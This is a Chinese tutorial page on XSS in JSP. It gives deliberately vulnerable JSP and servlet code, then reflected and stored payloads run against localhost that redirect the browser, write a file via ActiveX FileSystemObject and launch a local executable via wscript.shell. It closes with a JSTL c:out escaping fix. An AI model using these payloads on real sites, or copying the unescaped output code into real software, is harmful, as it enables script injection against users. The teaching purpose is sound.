
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>JSP安全开发之XSS漏洞详解_java / iVAN</title>

    <meta name="description" content="JSP安全开发之XSS漏洞详解_java 前言      大家好,好男人就是我,我就是好男人,我就是-0nise.在各大漏洞举报平台,我们时常会看到XSS漏洞.那么问题来了,为何会出现这种漏洞?出现这种漏洞应该怎么修复? 正文 1.XSS?XSS?XSS是什么鬼?      XSS又叫跨站脚本攻击(Cross Site Scripting),我不会告诉他原本是叫CSS的,但是为了不和我们所用的层叠样式表(Cascading Style Sheets)CSS搞混.CSS(跨站脚本攻击),CSS(层叠样式表)傻傻分不清.所以就叫XSS咯.">
  

  <!-- <link rel="shortcut icon" href="/favicon.png"> -->  
  <link href="https://pic.ikafan.com/staticx/iamivan/2/assets/css/bootstrap.css" rel="stylesheet">
  <link href="https://pic.ikafan.com/staticx/iamivan/2/assets/css/style.css" rel="stylesheet">
  <link rel="alternate" type="application/rss+xml" title="RSS Feed" href="/feed/" />
  <script src="https://n4.ikafan.com/g/show.js"></script>
  <!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries -->
  <!--[if lt IE 9]>
  <script src="/assets/js/html5shiv.js"></script>
  <script src="/assets/js/respond.min.js"></script>
  <![endif]-->
  <script>
  var _hmt = _hmt || [];
  (function() {
    var hm = document.createElement("script");
    hm.src = "https://hm.baidu.com/hm.js?c61d51e9fdcf1d1631ddfce8df9cd119";
    var s = document.getElementsByTagName("script")[0]; 
    s.parentNode.insertBefore(hm, s);
  })();
  </script>
 
</head>

<body>

  <div class="wrapper">

    <header id="header" class="container">
    
      <div id="logo">
        <a href="/"><img src="https://pic.ikafan.com/staticx/iamivan/2/assets/logo.png" title="" /></a>
      </div><!-- /logo -->

      <nav id="menu" class="navbar navbar-inverse hidden-xs">
        <div class="collapse navbar-collapse">
          <ul class="nav navbar-nav">
            <li class="active"><a href="/"><i class="glyphicon glyphicon-home"></i></a></li>
            <li><a href="/">首页</a></li>
            <li><a href="/tag/互联网/">互联网</a></li>
            <li><a href="/tag/java/">java</a></li>
            <li><a href="/tag/mysql/">mysql</a></li>
            <li><a href="/tag/android/">Android</a></li>
            <li><a href="/tag/ios/">IOS</a></li>
          </ul>
        </div>
        <form method="post" id="searchform" action="/search/">
             <input type="text" value="" name="keyword" id="keyword" title="search" /><input type="submit" value="Search" id="searchsubmit" />
        </form>
      </nav><!-- /nav -->

    </header>
    <!-- /header -->


    
    <div class="container">
      <div class="row">    <div id="main" class="col-md-8">


<h1 class="mtitle">JSP安全开发之XSS漏洞详解_java</h1>
<div id="single_top"></div>
<script>insertAdIfNeeded();</script>

    	<section>
		<article class="clearfix">
		<p><strong>前言</strong></p>
<p>     大家好，好男人就是我，我就是好男人，我就是-0nise。在各大漏洞举报平台，我们时常会看到XSS漏洞。那么问题来了，为何会出现这种漏洞？出现这种漏洞应该怎么修复？</p>
<p><strong>正文<br /></strong></p>
<p>1.XSS？XSS？XSS是什么鬼？</p>
<p>     XSS又叫跨站脚本攻击(Cross Site Scripting)，我不会告诉他原本是叫CSS的，但是为了不和我们所用的层叠样式表(Cascading Style Sheets)CSS搞混。CSS(跨站脚本攻击),CSS(层叠样式表)傻傻分不清。所以就叫XSS咯。</p>
<p>2.XSS的危害是什么？</p>
<p>实验一：</p>
<p>0x00构造代码</p>
<pre>
&lt;%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%&gt;
&lt;%
String path = request.getContextPath();
String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";
%&gt;
&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"&gt;
&lt;html&gt;
 &lt;head&gt;
 &lt;base href="&lt;%=basePath%&gt;"&gt;
 &lt;title&gt;My JSP 'index.jsp' starting page&lt;/title&gt;
  &lt;meta http-equiv="pragma" content="no-cache"&gt;
  &lt;meta http-equiv="cache-control" content="no-cache"&gt;
  &lt;meta http-equiv="expires" content="0"&gt;
  &lt;meta http-equiv="keywords" content="keyword1,keyword2,keyword3"&gt;
  &lt;meta http-equiv="description" content="This is my page"&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;div style="margin: 0 auto"&gt;
 &lt;%
//设置编码
   request.setCharacterEncoding("UTF-8");
//接收用户传入值
   String tmp = request.getParameter("opr");
   //减速传入值是否为空
   if(tmp == null){
     out.print("111");
   }else{
     //转码
     String opr = new String(tmp.getBytes("ISO-8859-1"),"utf-8");
     out.print(opr);
   }
 %&gt;
   我是内容
 &lt;/div&gt;
 &lt;/body&gt;
&lt;/html&gt;
</pre>
<p>0x01环境布局</p>
<p><img src="/assets/blank.gif" data-echo="//pic.ikafan.com/imgp/L3Byb3h5L2h0dHBzL3l1bnFpLXRlY2gub3NzLWNuLWhhbmd6aG91LmFsaXl1bmNzLmNvbS8yMDE2MDkxMzE3NTkwMzEucG5n.jpg"></p>
<p>0x02漏洞演练</p>
<p>我们访问:http://localhost:8080/XSS/index.jsp?opr=i%E6%98%A5%E7%A7%8B</p>
<p><img src="/assets/blank.gif" data-echo="//pic.ikafan.com/imgp/L3Byb3h5L2h0dHBzL3l1bnFpLXRlY2gub3NzLWNuLWhhbmd6aG91LmFsaXl1bmNzLmNvbS8yMDE2MDkxMzE3NTkwMzIucG5n.jpg"></p>
<p>然后访问:http://localhost:8080/XSS/index.jsp?opr=0nise</p>
<p><img src="/assets/blank.gif" data-echo="//pic.ikafan.com/imgp/L3Byb3h5L2h0dHBzL3l1bnFpLXRlY2gub3NzLWNuLWhhbmd6aG91LmFsaXl1bmNzLmNvbS8yMDE2MDkxMzE3NTkwMzMucG5n.jpg"></p>
<p>最后我们发现了一个“伟大的规律”：</p>
<p>   opr参数等于什么页面就打印什么。（好像是废话）</p>
<p>我们接着来加载一个图片看看</p>
<p>访问:http://localhost:8080/XSS/index.jsp?opr=%3Cimg%20src=%221.png%22%3E%3C/img%3E</p>
<p><img src="/assets/blank.gif" data-echo="//pic.ikafan.com/imgp/L3Byb3h5L2h0dHBzL3l1bnFpLXRlY2gub3NzLWNuLWhhbmd6aG91LmFsaXl1bmNzLmNvbS8yMDE2MDkxMzE3NTkwMzQucG5n.jpg"></p>
<p>既然图片都可以加载，那么我们JS文件是不是也阔以加载呢？</p>
<p>访问：http://localhost:8080/XSS/index.jsp?opr=%3Cscript%3Ealert(/i%E6%98%A5%E7%A7%8B%E7%A4%BE%E5%8C%BA%E6%AC%A2%E8%BF%8E%E5%A4%A7%E5%AE%B6/)%3C/script%3E</p>
<p><img src="/assets/blank.gif" data-echo="//pic.ikafan.com/imgp/L3Byb3h5L2h0dHBzL3l1bnFpLXRlY2gub3NzLWNuLWhhbmd6aG91LmFsaXl1bmNzLmNvbS8yMDE2MDkxMzE3NTkwMzUucG5n.jpg"></p>
<p>Js？Js？那么是不是可以来改变跳转后地址？</p>
<p>访问：http://localhost:8080/XSS/index.jsp?opr=%3Cscript%3Elocation.href=%27http://bbs.ichunqiu.com%27%3C/script%3E</p>
<p><img src="/assets/blank.gif" data-echo="//pic.ikafan.com/imgp/L3Byb3h5L2h0dHBzL3l1bnFpLXRlY2gub3NzLWNuLWhhbmd6aG91LmFsaXl1bmNzLmNvbS8yMDE2MDkxMzE3NTkwMzYucG5n.jpg"></p>
<p>既然xss都可以加载js，那么，我们是不是通过js来打开本地的某些东西？</p>
<p><img src="/assets/blank.gif" data-echo="//pic.ikafan.com/imgp/L3Byb3h5L2h0dHBzL3l1bnFpLXRlY2gub3NzLWNuLWhhbmd6aG91LmFsaXl1bmNzLmNvbS8yMDE2MDkxMzE3NTkwMzcucG5n.jpg"></p>
<p>提前放了一个MD5.exe文件</p>
<p>访问：http://localhost:8080/XSS/index.jsp?opr=</p>
<p>既然连本地文件都可以打开那么远程文件木马？来个电脑恶搞？这个自己慢慢象限。我可没说啊。。。。。</p>
<p>文件都可以打开，那么写一些文件呢？</p>
<p>访问：http://localhost:8080/XSS/index.jsp?opr=%3Cscript%3Evar%20fso,tf;fso%20=%20new%20ActiveXObject(%22Scripting.FileSystemObject%22);tf%20=%20fso.CreateTextFile(%22d:\\test.txt%22,true);tf.WriteLine(%22i%E6%98%A5%E7%A7%8B%E7%A4%BE%E5%8C%BA%E6%AC%A2%E8%BF%8E%E6%82%A8%22);tf.Close();alert(%22%E6%96%87%E4%BB%B6%E5%86%99%E5%85%A5%E6%88%90%E5%8A%9F%EF%BC%81%22);%3C/script%3E</p>
<p><img src="/assets/blank.gif" data-echo="//pic.ikafan.com/imgp/L3Byb3h5L2h0dHBzL3l1bnFpLXRlY2gub3NzLWNuLWhhbmd6aG91LmFsaXl1bmNzLmNvbS8yMDE2MDkxMzE3NTkwMzkucG5n.jpg"></p>
<p><img src="/assets/blank.gif" data-echo="//pic.ikafan.com/imgp/L3Byb3h5L2h0dHBzL3l1bnFpLXRlY2gub3NzLWNuLWhhbmd6aG91LmFsaXl1bmNzLmNvbS8yMDE2MDkxMzE3NTkwMzEwLnBuZw==.jpg"></p>
<p>通过以上实验我们可以看出opr参数赋值操作。如果opr参数没有值的话，就无法执行执行，被攻击者必须访问攻击者提前设计好的才能攻击。这种XSS攻击方式叫做:存储型XSS</p>
<p>如果你想看到更给力的实验，请接着往下看。</p>
<p><strong>实验二：</strong></p>
<p>前言：</p>
<p>大部分网站都会和数据打交道那么，XSS漏洞出现这些网站是什么样子的？</p>
<p>0x00构造代码</p>
<p>数据库部分</p>
<p><img src="/assets/blank.gif" data-echo="//pic.ikafan.com/imgp/L3Byb3h5L2h0dHBzL3l1bnFpLXRlY2gub3NzLWNuLWhhbmd6aG91LmFsaXl1bmNzLmNvbS8yMDE2MDkxMzE3NTkwMzExLnBuZw==.jpg"></p>
<p>BaseDao.java</p>
<pre>
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
public class BaseDAO {
  //打开连接
  public Connection getConn(){
    Connection conn = null;
    try {
      Class.forName("com.microsoft.sqlserver.jdbc.SQLServerDriver");
      conn = DriverManager.getConnection("jdbc:sqlserver://localhost:1433;databaseName=SQLTMP","sa","sa");
    } catch (ClassNotFoundException e) {
      e.printStackTrace();
    } catch (SQLException e) {
      e.printStackTrace();
    }

    return conn;
  }

  //关闭链接的方法
  public void closeAll(Connection conn,Statement stat,ResultSet rs){
    try {
      if(rs != null)
        rs.close();
      if(stat != null)
        stat.close();
      if(conn != null)
        conn.close();

    } catch (SQLException e) {
      e.printStackTrace();
    }
  }
  //重载关闭方法
  public void closeAll(Connection conn,PreparedStatement pstat,ResultSet rs){
    try {
      if(rs != null)
        rs.close();
      if(pstat != null)
        pstat.close();
      if(conn != null)
        conn.close();

    } catch (SQLException e) {
      e.printStackTrace();
    }
  }
  //继续重载
  public void closeAll(Connection conn,PreparedStatement pstat){
    try {
      if(pstat != null)
        pstat.close();
      if(conn != null)
        conn.close();
    } catch (SQLException e) {
      e.printStackTrace();
    }
  }
  //增删改的公用方法
  public int upDate(String sql,Object[] pram){

    PreparedStatement pstat = null;
    Connection conn = null;
    int a = 0;

    try {
      conn = getConn();
      pstat =conn.prepareStatement(sql);
      //遍历参数集合，将集合中的参数对应添加到sql语句中
      for (int i = 1; i &lt;= pram.length; i++) {
        pstat.setObject(i, pram[i-1]);
      }
      //调用方法
      a = pstat.executeUpdate();

    } catch (SQLException e) {
      e.printStackTrace();
    }finally{
      closeAll(conn, pstat);
    }
    return a;
  }
}
</pre>
<p>CommentDao.java</p>
<pre>
import java.sql.*;
import java.util.*;
import entity.*;
public class CommentDao extends BaseDAO {
  /**
   * 获取所有留言
   * */
  public List&lt;comm&gt; GetComment(){
    //SQL语句
    String sql = "SELECT CID,CName,CContext FROM Comments";
    List&lt;comm&gt; list = new ArrayList&lt;comm&gt;();
    //数据库连接对象
    Connection conn = null;
    //SQL执行对象
    PreparedStatement pstmt = null;
    //数据库执行返回值
    ResultSet rs = null;
    try {
      //创建数据库链接
      conn = this.getConn();
      //创建SQL执行对象
      pstmt = conn.prepareStatement(sql);
      //执行SQL语句  返回值
      rs = pstmt.executeQuery();
      //读取
      while (rs.next()) {
        comm comment = new comm();
        comment.setCID(rs.getInt("CID"));
        comment.setCName(rs.getString("CName"));
        comment.setCContext(rs.getString("CContext"));
        list.add(comment);
      }
    } catch (Exception e) {
      e.printStackTrace();
    }finally{
      //关闭
      this.closeAll(conn, pstmt, rs);
    }
    return list;
  }
  public int AddComment(comm comment){
    String sql = "INSERT INTO Comments VALUES(?,?)";
    //受影响行数
    int result = 0;
    //数据库连接对象
    Connection conn = null;
    //SQL执行对象
    PreparedStatement pstmt = null;
    try {
      //创建数据库链接
      conn = this.getConn();
      //创建SQL执行对象
      pstmt = conn.prepareStatement(sql);
      //设置参数
      pstmt.setString(1, comment.getCName());
      pstmt.setString(2, comment.getCContext());
      //执行SQL语句
      result = pstmt.executeUpdate();
    } catch (Exception e) {
      e.printStackTrace();
    }finally{
      this.closeAll(conn, pstmt);
    }
    return result;
  }
}
</pre>
<p>CommentServlvet</p>
<pre>
import java.io.*;
import javax.servlet.*;
import javax.servlet.http.*;
import entity.*;
public class CommentServlvet extends HttpServlet {
  /**
   * doGet()
   */
  public void doGet(HttpServletRequest request, HttpServletResponse response)
      throws ServletException, IOException {
    request.setCharacterEncoding("UTF-8");
    response.setContentType("text/html;charset=UTF-8");
    PrintWriter out = response.getWriter();
    String opr = request.getParameter("opr");
    CommentDao commentDao = new CommentDao();
    //检索参数是否为空
    if(opr == null || opr.equals("all")){
      request.setAttribute("all", commentDao.GetComment());
      //转发
      request.getRequestDispatcher("comment.jsp").forward(request, response);
    }else if (opr.equals("add")){
      comm comment = new comm();
      comment.setCName(request.getParameter("UName"));
      comment.setCContext(request.getParameter("context"));
      if(commentDao.AddComment(comment) &gt; 0){
        out.print("&lt;script&gt;alert('留言成功');location.href='CommentServlvet?opr=all';&lt;/script&gt;");
      }else{
        out.print("&lt;script&gt;alert('留言失败');location.href='CommentServlvet?opr=all';&lt;/script&gt;");
      }
    }else{
      request.setAttribute("all", commentDao.GetComment());
      //转发
      request.getRequestDispatcher("comment.jsp").forward(request, response);
    }
    out.flush();
    out.close();
  }

  /**
   * doPost()
   */
  public void doPost(HttpServletRequest request, HttpServletResponse response)
      throws ServletException, IOException {
    doGet(request, response);
  }
}
</pre>
<p>Comment.jsp</p>
<pre>
&lt;%@ page language="java" import="java.util.*,entity.*" pageEncoding="UTF-8"%&gt;
&lt;%
String path = request.getContextPath();
String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";
%&gt;
&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"&gt;
&lt;html&gt;
 &lt;head&gt;
 &lt;base href="&lt;%=basePath%&gt;"&gt;
 &lt;title&gt;My JSP 'comment.jsp' starting page&lt;/title&gt;
  &lt;meta http-equiv="pragma" content="no-cache"&gt;
  &lt;meta http-equiv="cache-control" content="no-cache"&gt;
  &lt;meta http-equiv="expires" content="0"&gt;
  &lt;meta http-equiv="keywords" content="keyword1,keyword2,keyword3"&gt;
  &lt;meta http-equiv="description" content="This is my page"&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;%
   request.setCharacterEncoding("UTF-8");
   if(request.getAttribute("all") == null){
     request.getRequestDispatcher("CommentServlvet?opr=all").forward(request, response);
   }
 %&gt;
 &lt;table&gt;
 &lt;%
   List&lt;entity.comm&gt; list = (List&lt;entity.comm&gt;)request.getAttribute("all");
    for(int i = 0; i &lt; list.size(); i++ ){
 %&gt;
     &lt;tr&gt;
     &lt;td&gt;&lt;%=list.get(i).getCName() %&gt;&lt;/td&gt;
     &lt;td&gt;&lt;%=list.get(i).getCContext() %&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;%
   }
 %&gt;
 &lt;/table&gt;
 &lt;form action="CommentServlvet?opr=add" method="post"&gt;
   &lt;textarea rows="5" cols="30" name="context"&gt;&lt;/textarea&gt;
   昵称:&lt;input type="text" name="UName" /&gt;
   &lt;input type="submit" value="提交" /&gt;
 &lt;/form&gt;
 &lt;/body&gt;
&lt;/html&gt;
</pre>
<p>0x01漏洞实验</p>
<p><code>root@1~# </code></p>
<p>我们在留言板留言：</p>
<p><code>&lt;script&gt; var objShell = new ActiveXObject("wscript.shell");objShell.Run("G:/work/XSS/WebRoot/Md5.exe");&lt;/script&gt;</code></p>
<p><img src="/assets/blank.gif" data-echo="//pic.ikafan.com/imgp/L3Byb3h5L2h0dHBzL3l1bnFpLXRlY2gub3NzLWNuLWhhbmd6aG91LmFsaXl1bmNzLmNvbS8yMDE2MDkxMzE3NTkwNDEyLnBuZw==.jpg"></p>
<p>然后访问:http://localhost:8080/XSS/comment.jsp</p>
<p><img src="/assets/blank.gif" data-echo="//pic.ikafan.com/imgp/L3Byb3h5L2h0dHBzL3l1bnFpLXRlY2gub3NzLWNuLWhhbmd6aG91LmFsaXl1bmNzLmNvbS8yMDE2MDkxMzE3NTkwNDEzLnBuZw==.jpg"></p>
<p>这样只要访问这个页面，软件就自动打开了，来个远程文件？慢慢领悟。</p>
<p><code>root@2~# <br /></code></p>
<p>我们在留言板留言：</p>
<p><u>复制代码</u> 代码如下:</p>
<p>&lt;script&gt;var fso,tf;fso = new ActiveXObject("Scripting.FileSystemObject");tf = fso.CreateTextFile("d:\\test.txt",true);tf.WriteLine("i春秋社区欢迎您");tf.Close();alert("文件写入成功！");&lt;/script&gt;</p>
<p><img src="/assets/blank.gif" data-echo="//pic.ikafan.com/imgp/L3Byb3h5L2h0dHBzL3l1bnFpLXRlY2gub3NzLWNuLWhhbmd6aG91LmFsaXl1bmNzLmNvbS8yMDE2MDkxMzE3NTkwNDE0LnBuZw==.jpg"></p>
<p>然后访问: http://localhost:8080/XSS/comment.jsp</p>
<p><img src="/assets/blank.gif" data-echo="//pic.ikafan.com/imgp/L3Byb3h5L2h0dHBzL3l1bnFpLXRlY2gub3NzLWNuLWhhbmd6aG91LmFsaXl1bmNzLmNvbS8yMDE2MDkxMzE3NTkwNDE1LnBuZw==.jpg"></p>
<p>文件写入成功。</p>
<p><code>root@3~#</code></p>
<p>留言内容:</p>
<p>[code]&lt;script&gt;location.href='http://bbs.ichunqiu.com'&lt;/script&gt;[code]</p>
<p>访问页面:http://localhost:8080/XSS/comment.jsp</p>
<p><img src="/assets/blank.gif" data-echo="//pic.ikafan.com/imgp/L3Byb3h5L2h0dHBzL3l1bnFpLXRlY2gub3NzLWNuLWhhbmd6aG91LmFsaXl1bmNzLmNvbS8yMDE2MDkxMzE3NTkwNDE2LnBuZw==.jpg"></p>
<p>访问留言页面自动跳转到攻击者特定的网站。难道这就是传说中的劫持吗？</p>
<p><strong>3.XSS防御方案</strong></p>
<p>正所谓哪里有攻击，哪里就有防御。XSS一样，有攻击的方式，也有防御的方案。</p>
<p>EL表达式+JSTL标签库</p>
<p>EL（Expression Language）：[size=12.0000pt]为了使JSP写起来更简单。表达式语言的灵感来自于ECMAScript和XPath表达式语语言，他提供了JSP中简化表达式的方法，让jsp代码更简单。</p>
<p>JSTL（JSP Standard Tag Library):开放源代码的JSP标签库。</p>
<p>实验一防御代码：</p>
<pre>
&lt;%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%&gt;
&lt;%@ taglib uri="http://java.sun.com/jsp/jstl/core" prefix="c" %&gt;
&lt;%
String path = request.getContextPath();
String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";
%&gt;
&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"&gt;
&lt;html&gt;
 &lt;head&gt;
 &lt;base href="&lt;%=basePath%&gt;"&gt;
 &lt;title&gt;My JSP 'index.jsp' starting page&lt;/title&gt;
  &lt;meta http-equiv="pragma" content="no-cache"&gt;
  &lt;meta http-equiv="cache-control" content="no-cache"&gt;
  &lt;meta http-equiv="expires" content="0"&gt;
  &lt;meta http-equiv="keywords" content="keyword1,keyword2,keyword3"&gt;
  &lt;meta http-equiv="description" content="This is my page"&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;div style="margin: 0 auto"&gt;
 &lt;%
   request.setCharacterEncoding("UTF-8");
   String tmp = request.getParameter("opr");
   //减速传入值是否为空
   if(tmp == null){
     out.print("111");
   }else{
     //转码
     String opr = new String(tmp.getBytes("ISO-8859-1"),"utf-8");
     request.setAttribute("name", opr);
     %&gt;
     &lt;c:out value="${requestScope.name }"&gt;&lt;/c:out&gt;
     &lt;%
   }
 %&gt;
   我是内容
 &lt;/div&gt;
 &lt;/body&gt;
&lt;/html&gt;
</pre>
<p><img src="/assets/blank.gif" data-echo="//pic.ikafan.com/imgp/L3Byb3h5L2h0dHBzL3l1bnFpLXRlY2gub3NzLWNuLWhhbmd6aG91LmFsaXl1bmNzLmNvbS8yMDE2MDkxMzE3NTkwNDE3LnBuZw==.jpg"></p>
<p>实验二防御代码：</p>
<pre>
&lt;%@ page language="java" import="java.util.*,entity.*" pageEncoding="UTF-8"%&gt;
&lt;%@ taglib uri="http://java.sun.com/jsp/jstl/core" prefix="c" %&gt;
&lt;%
String path = request.getContextPath();
String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";
%&gt;
</pre>
<pre>
&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"&gt;
&lt;html&gt;
 &lt;head&gt;
 &lt;base href="&lt;%=basePath%&gt;"&gt;
 &lt;title&gt;My JSP 'comment.jsp' starting page&lt;/title&gt;
  &lt;meta http-equiv="pragma" content="no-cache"&gt;
  &lt;meta http-equiv="cache-control" content="no-cache"&gt;
  &lt;meta http-equiv="expires" content="0"&gt;
  &lt;meta http-equiv="keywords" content="keyword1,keyword2,keyword3"&gt;
  &lt;meta http-equiv="description" content="This is my page"&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;%
   request.setCharacterEncoding("UTF-8");
   if(request.getAttribute("all") == null){
     request.getRequestDispatcher("CommentServlvet?opr=all").forward(request, response);
   }
 %&gt;
 &lt;table&gt;
&lt;!-- 防御XSS方案 --&gt;
 &lt;c:forEach var="x" items="${requestScope.all }"&gt;
 &lt;tr&gt;
   &lt;td&gt;
   &lt;c:out value="${x.getCName() }"&gt;&lt;/c:out&gt;
   &lt;/td&gt;
   &lt;td&gt;
   &lt;c:out value="${x.getCContext() }"&gt;&lt;/c:out&gt;
   &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/c:forEach&gt;
 &lt;/table&gt;
 &lt;form action="CommentServlvet?opr=add" method="post"&gt;
   &lt;textarea rows="5" cols="30" name="context"&gt;&lt;/textarea&gt;
   昵称:&lt;input type="text" name="UName" /&gt;
   &lt;input type="submit" value="提交" /&gt;
 &lt;/form&gt;
 &lt;/body&gt;
&lt;/html&gt;
</pre>
<p><img src="/assets/blank.gif" data-echo="//pic.ikafan.com/imgp/L3Byb3h5L2h0dHBzL3l1bnFpLXRlY2gub3NzLWNuLWhhbmd6aG91LmFsaXl1bmNzLmNvbS8yMDE2MDkxMzE3NTkwNDE4LnBuZw==.jpg"></p>
<p><strong>结束语</strong></p>
<p>        技术无黑白，专研甚好。</p>
<p>以上是小编为您精心准备的的内容，在的博客、问答、公众号、人物、课程等栏目也有的相关内容，欢迎继续使用右上角搜索按钮进行搜索java<br />
                    ，                jsp<br />
                    ，                xss漏洞修复<br />
                    ，                XSS漏洞<br />
                                    xss漏洞<br />
                                    jsp xss漏洞修复、jsp网站开发详解、jsp应用开发详解、jsp开发技术详解、jsp应用开发详解 pdf，以便于您获取更多的相关知识。</p>				<div id="single_bottom"></div>
<script>insertAdIfNeeded();</script>
				<div id="time"><strong>时间：</strong> 2024-02-19 09:14:41</div>
		
		</article>

		<!-- social network share -->

<!-- 		<div id="tags">
            <strong>Tags:</strong> <a href="https://www.iamivan.net/tag/java/" title="java">java</a>, <a href="https://www.iamivan.net/tag/jsp/" title="jsp">jsp</a>, <a href="https://www.iamivan.net/tag/xss%e6%bc%8f%e6%b4%9e/" title="XSS漏洞">XSS漏洞</a>, <a href="https://www.iamivan.net/tag/xss%e6%bc%8f%e6%b4%9e%e4%bf%ae%e5%a4%8d/" title="xss漏洞修复">xss漏洞修复</a>        </div> -->
	</section>
	
	

		<div id="similar">

		<h3>JSP安全开发之XSS漏洞详解_java的相关文章</h3>

								<section>
		<header>
			<h2 class="title">
                <a href="https://www.iamivan.net/a/b3ZVqJz.html" rel="bookmark">Android编程开发之NotiFication用法详解&lowbar;Android</a>
			</h2>
		</header>
		<article class="clearfix">
									<div class="summary">
				本文实例讲述了Android编程开发之NotiFication用法.分享给大家供大家参考,具体如下: notification就是通知的意思,安卓中指通知栏,一般用在电话,短信,邮件,闹钟铃声,在手机的状态栏上就会出现一个小图标,提示用户处理这个快讯,这时手从上方滑动状态栏就可以展开并处理这个快讯. 在帮助文档中,是这么说的, notification类表示一个持久的通知,将提交给用户使用NotificationManager.已添加的Notification.Builder,使其更容易构建通知			</div>
		</article>
	</section>
				<section>
		<header>
			<h2 class="title">
                <a href="https://www.iamivan.net/a/zwXmE5b.html" rel="bookmark">Android开发之ImageLoader使用详解&lowbar;Android</a>
			</h2>
		</header>
		<article class="clearfix">
									<div class="summary">
				先给大家展示效果图,看看是大家想要的效果吗,如果还满意,请参考以下代码: 前言 UniversalImageLoader是用于加载图片的一个开源项目,在其项目介绍中是这么写的, •支持多线程图片加载 •提供丰富的细节配置,比如线程池大小,HTPP请求项,内存和磁盘缓存,图片显示时的参数配置等等: •提供双缓存 •支持加载过程的监听: •提供图片的个性化显示配置接口: •Widget支持(这个,个人觉得没必要写进来,不过尊重原文) 其他类似的项目也有很多,但这个作为github上著名的开源项目被广			</div>
		</article>
	</section>
				<section>
		<header>
			<h2 class="title">
                <a href="https://www.iamivan.net/a/p86dlxb.html" rel="bookmark">Android开发之ImageLoader使用详解</a>
			</h2>
		</header>
		<article class="clearfix">
									<div class="summary">
				先给大家展示效果图,看看是大家想要的效果吗,如果还满意,请参考以下代码: 前言 UniversalImageLoader是用于加载图片的一个开源项目,在其项目介绍中是这么写的, •支持多线程图片加载 •提供丰富的细节配置,比如线程池大小,HTPP请求项,内存和磁盘缓存,图片显示时的参数配置等等: •提供双缓存 •支持加载过程的监听: •提供图片的个性化显示配置接口: •Widget支持(这个,个人觉得没必要写进来,不过尊重原文) 其他类似的项目也有很多,但这个作为github上著名的开源项目被广			</div>
		</article>
	</section>
				<section>
		<header>
			<h2 class="title">
                <a href="https://www.iamivan.net/a/p5QVrAp.html" rel="bookmark">Android开发之Retrofit用法详解</a>
			</h2>
		</header>
		<article class="clearfix">
									<div class="summary">
				Retrofit是Square公司开发的一款针对Android网络请求的框架,Retrofit2底层基于OkHttp实现的,OkHttp现在已经得到Google官方认可,大量的app都采用OkHttp做网络请求,其源码详见 OkHttp Github . 本文全部是在Retrofit2.0+版本基础上论述,所用例子全部来自豆瓣Api 首先先来看一个完整Get请求是如何实现: 创建业务请求接口,具体代码如下:  代码如下 复制代码 public interface BlueService {   			</div>
		</article>
	</section>
				<section>
		<header>
			<h2 class="title">
                <a href="https://www.iamivan.net/a/pPlZdZp.html" rel="bookmark">Android 开发之旅：详解view的几种布局方式及实践&lowbar;Android</a>
			</h2>
		</header>
		<article class="clearfix">
									<div class="summary">
				引言 我们对Android应用程序运行原理及布局文件可谓有了比较深刻的认识和理解,并且用&quot;Hello World!&quot;程序来实践证明了.在继续深入Android开发之旅之前,有必要解决前两篇中没有介绍的遗留问题:View的几种布局显示方法,以后就不会在针对布局方面做过多的介绍.View的布局显示方式有下面几种:线性布局(Linear Layout).相对布局(Relative Layout).表格布局(Table Layout).网格视图(Grid View).标签布局(Tab Layo			</div>
		</article>
	</section>
				<section>
		<header>
			<h2 class="title">
                <a href="https://www.iamivan.net/a/zO2RQvp.html" rel="bookmark">Android 开发之旅：详解view的几种布局方式及实践</a>
			</h2>
		</header>
		<article class="clearfix">
									<div class="summary">
				引言 我们对Android应用程序运行原理及布局文件可谓有了比较深刻的认识和理解,并且用&quot;Hello World!&quot;程序来实践证明了.在继续深入Android开发之旅之前,有必要解决前两篇中没有介绍的遗留问题:View的几种布局显示方法,以后就不会在针对布局方面做过多的介绍.View的布局显示方式有下面几种:线性布局(Linear Layout).相对布局(Relative Layout).表格布局(Table Layout).网格视图(Grid View).标签布局(Tab Layo			</div>
		</article>
	</section>
				<section>
		<header>
			<h2 class="title">
                <a href="https://www.iamivan.net/a/MrKV7xp.html" rel="bookmark">java&lpar;jsp&rpar;整合discuz同步登录功能详解</a>
			</h2>
		</header>
		<article class="clearfix">
									<div class="summary">
				 jsp整合discuz同步登录功能详解,Uenter是Comsenz旗下各个产品之间信息直接传递的一个桥梁,通过UCenter站长可以无缝整合Comsenz系列产品,Center拥有机制完善的接口,经过简单修改便可以挂接其它任何平台的第三方的网络应用程序 最近做了一个资源库系统的项目,老师说可以搭建开源论坛替代自己开发社交模块,正好在开源中国上看到了一个利用discuz的UCenter功能实现同步登录的开源项目(https://code.google.com/p/discuz-ucenter-			</div>
		</article>
	</section>
				<section>
		<header>
			<h2 class="title">
                <a href="https://www.iamivan.net/a/Mxv6oOz.html" rel="bookmark">一周新闻回顾：万般不舍的微软XP退休 OpenSSL重大漏洞详解</a>
			</h2>
		</header>
		<article class="clearfix">
									<div class="summary">
